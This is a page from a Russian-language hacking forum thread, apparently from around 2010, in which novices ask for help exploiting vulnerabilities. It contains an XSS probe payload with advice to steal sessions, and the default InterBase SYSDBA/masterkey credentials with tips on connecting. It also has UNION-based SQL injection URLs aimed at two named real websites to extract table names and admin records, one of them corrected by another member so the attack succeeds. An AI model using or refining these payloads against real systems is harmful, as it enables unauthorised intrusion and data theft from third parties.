Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Безопасность / Уязвимости и защита
 
  Страница 2
  , 17:09   #16
Продвинутый
 
Аватар для M@ZAX@KEP
 
Локация: 404 - Not Found
Регистрация: 14.05.2009
Сообщений: 2,831

Репутация: 616 / 8

HPC Activity Medal 
По умолчанию Re: Вопросы по уязвимостям

hugolom, нет. Для того оно и сделано)) Обсуждал я недавно эту тему с кем-то в лс... пришли к тому, что можно надеяться только на человеческий фактор - что не весь ввод так фильтруется, что где-нибудь, что-нибудь да забыли, пропустили.
__________________
wut...?
Пользователь вне форума    
Наши Спонсоры
  , 19:34   #17
Форумчанин
 
Регистрация: 03.11.2010
Сообщений: 43

Репутация: 0 / 0
По умолчанию Re: Вопросы по уязвимостям

Люди вот вопрос.
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь


при подстановки в поля

code:
"><script>alert()</script>
вылазит окошечко.
я так понял это пассивная xss
что с ней делать дальше.
зы. или скиньте ссылки на норм статьи по xss а то по гуглу всего 2 нормальные гуляют из которых мало что ясно.
 

Последний раз редактировалось onekey_nw; 18.11.2010 в 14:44.
Пользователь вне форума    
  , 16:05   #18
Местный
 
Локация: Украина
Регистрация: 18.08.2010
Сообщений: 178

Репутация: 7 / 0
По умолчанию помогите раскрутить уязвимость

сканер показал уязвимость на сесвере
Цитата:
5.37 уязвимость Порт 3050/tcp - InterBase 192.168.0.210 [SERVER]

Имя сервиса : InterBase SQL Server



5.37.1 пароль по умолчанию 192.168.0.210 [SERVER], уязвимость3050/tcp - InterBase

Описание
Пользователь 'SYSDBA' имеет стандартный пароль 'masterkey'.
Решение
Изменить пароль.
что можно получить используя ее и как ее использовать?

с меня спасибо!
__________________
JID:[email protected]
Пользователь вне форума    
  , 16:29   #19
Форумчанин
 
Аватар для 500mhz
 
Регистрация: 14.11.2010
Сообщений: 87

Репутация: 55 / 1
По умолчанию Re: помогите раскрутить уязвимость

с правами SYSDBA , ну ребетнуть или вырубить сможеш к примеру , сбэкапить тоже, востановить.
__________________
0days buy/sell
Пользователь вне форума    
  , 18:49   #20
Местный
 
Локация: Где-то тут, недалеко от где-то там.
Регистрация: 03.04.2009
Сообщений: 355

Репутация: 110 / 2
По умолчанию Re: помогите раскрутить уязвимость

По идеи, используя логин SYSDBA и пароль masterkey, сможешь подключиться к СУБД сервера.
__________________
Если слишком часто посылать людей в google, то google начнёт отвечать на запросы отсылкой в google =/
Пользователь вне форума    
  , 19:02   #21
Форумчанин
 
Аватар для 500mhz
 
Регистрация: 14.11.2010
Сообщений: 87

Репутация: 55 / 1
По умолчанию Re: помогите раскрутить уязвимость

Цитата:
По идеи, используя логин SYSDBA и пароль masterkey, сможешь подключиться к СУБД сервера.
а не покажеш на шкриншотах как ты это делаеш а?
__________________
0days buy/sell
Пользователь вне форума    
  , 19:05   #22
Местный
 
Локация: Где-то тут, недалеко от где-то там.
Регистрация: 03.04.2009
Сообщений: 355

Репутация: 110 / 2
По умолчанию Re: помогите раскрутить уязвимость

Качаешь программу InterBase для подключения к СУБД а дальше только ручками, ручками.. Скрин рук присылать нужно, или догадаешься что это?
__________________
Если слишком часто посылать людей в google, то google начнёт отвечать на запросы отсылкой в google =/
Пользователь вне форума    
  , 19:08   #23
Форумчанин
 
Аватар для 500mhz
 
Регистрация: 14.11.2010
Сообщений: 87

Репутация: 55 / 1
По умолчанию Re: помогите раскрутить уязвимость

нас в пту еше этому не учили, вот и просю гуру хацкинга пролить свет на проблему.
__________________
0days buy/sell
Пользователь вне форума    
  , 18:31   #24
Форумчанин
 
Регистрация: 07.08.2010
Сообщений: 82

Репутация: -4 / 0
По умолчанию Re: Вопросы по уязвимостям

Скрытый текст (вы должны быть авторизованы и иметь 30 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь


вот нащёл xss чё с ней делать дальше???
 
Пользователь вне форума    
  , 19:33   #25
Постоянный
 
Аватар для hugolom
 
Регистрация: 21.04.2010
Сообщений: 846

Репутация: 320 / 4
По умолчанию Re: Вопросы по уязвимостям

Можешь украсть сессию!!11 статей полно по этой теме
__________________
ем детей
Пользователь вне форума    
  , 20:16   #26
Постоянный
 
Аватар для hugolom
 
Регистрация: 21.04.2010
Сообщений: 846

Репутация: 320 / 4
По умолчанию Re: Вопросы по уязвимостям

Есть ли где нить литература\статьи по поиску уязвимостей в движках?
т.е. если есть сорс его.
__________________
ем детей
Пользователь вне форума    
  , 15:18   #27
Продвинутый
 
Аватар для M@ZAX@KEP
 
Локация: 404 - Not Found
Регистрация: 14.05.2009
Сообщений: 2,831

Репутация: 616 / 8

HPC Activity Medal 
По умолчанию Re: Вопросы по уязвимостям

hugolom, есть конечно.
__________________
wut...?
Пользователь вне форума    
  , 04:47   #28
Форумчанин
 
Аватар для kimpossible
 
Регистрация: 04.11.2009
Сообщений: 79

Репутация: 0 / 0
По умолчанию Re: Вопросы по уязвимостям

народ помогите с сайтом http://old.cageprisoners.com/article...sion(),4,5,6--
остановился тут дальше незнаю че делать http://old.cageprisoners.com/article...61646d696e73--

http://old.cageprisoners.com/article...+from+admins--
 
Пользователь вне форума    
  , 11:15   #29
Banned
 
Регистрация: 13.02.2010
Сообщений: 28

Репутация: 30 / 0
По умолчанию Re: Вопросы по уязвимостям

Застрял
Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь

Получается почему то только последние
Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
а там белеберда.
Не пойму почему другие не поддаются или я не выспался?
 
Пользователь вне форума    
  , 11:37   #30
Продвинутый
 
Аватар для stan_q
 
Локация: Бродяга
Регистрация: 26.04.2009
Сообщений: 1,193

Репутация: 389 / 5
По умолчанию Re: Вопросы по уязвимостям

Цитата:
Сообщение от kimpossible Посмотреть сообщение
народ помогите с сайтом http://old.cageprisoners.com/article...sion(),4,5,6-- остановился тут дальше незнаю че делать http://old.cageprisoners.com/article...61646d696e73-- http://old.cageprisoners.com/article...+from+admins--
Ошибка в запросе: вместо column_name написал table_name.
Правильный запрос http://old.cageprisoners.com/article...61646d696e73--
Дальше, думаю, разберешься

Добавлено через 5 минут
Цитата:
Сообщение от Beelzebul Посмотреть сообщение
Застрял Скрытый текст, требуется 1 сообщение(ий) (сейчас у вас 1053): http://www.beliodobrom.by/ru/agromas...p_concat%28tab le_name%29,10,11,12,13,14,15,16,17,18,19,20+from+i nformation_schema.tables+limit+0,1 Получается почему то только последние Скрытый текст, требуется 1 сообщение(ий) (сейчас у вас 1053): beliodobrom,beliodobrom0001 а там белеберда. Не пойму почему другие не поддаются или я не выспался?
А других там и нет. Такое тоже бывает
__________________
Критикуя - предлагай

Последний раз редактировалось stan_q; 05.12.2010 в 11:43. Причина: Добавлено сообщение
Пользователь вне форума    

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сетевой этикет (Перед тем, как задать вопрос хакеру) Ram0nlord За чашечкой чая 6 21.05.2012 19:01
Вопросы новичков по дорвеям sanchezqwert SEO 2 26.05.2011 07:51
Тут вопросы по дедикам, радминам! Shade Новичкам 71 16.12.2010 21:56
Ответы на все твои вопросы stan_q Новичкам 3 14.12.2010 22:44
[Вопрос] Вопросы по взлому,хакерству. zet611 Новичкам 10 29.10.2010 15:40



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.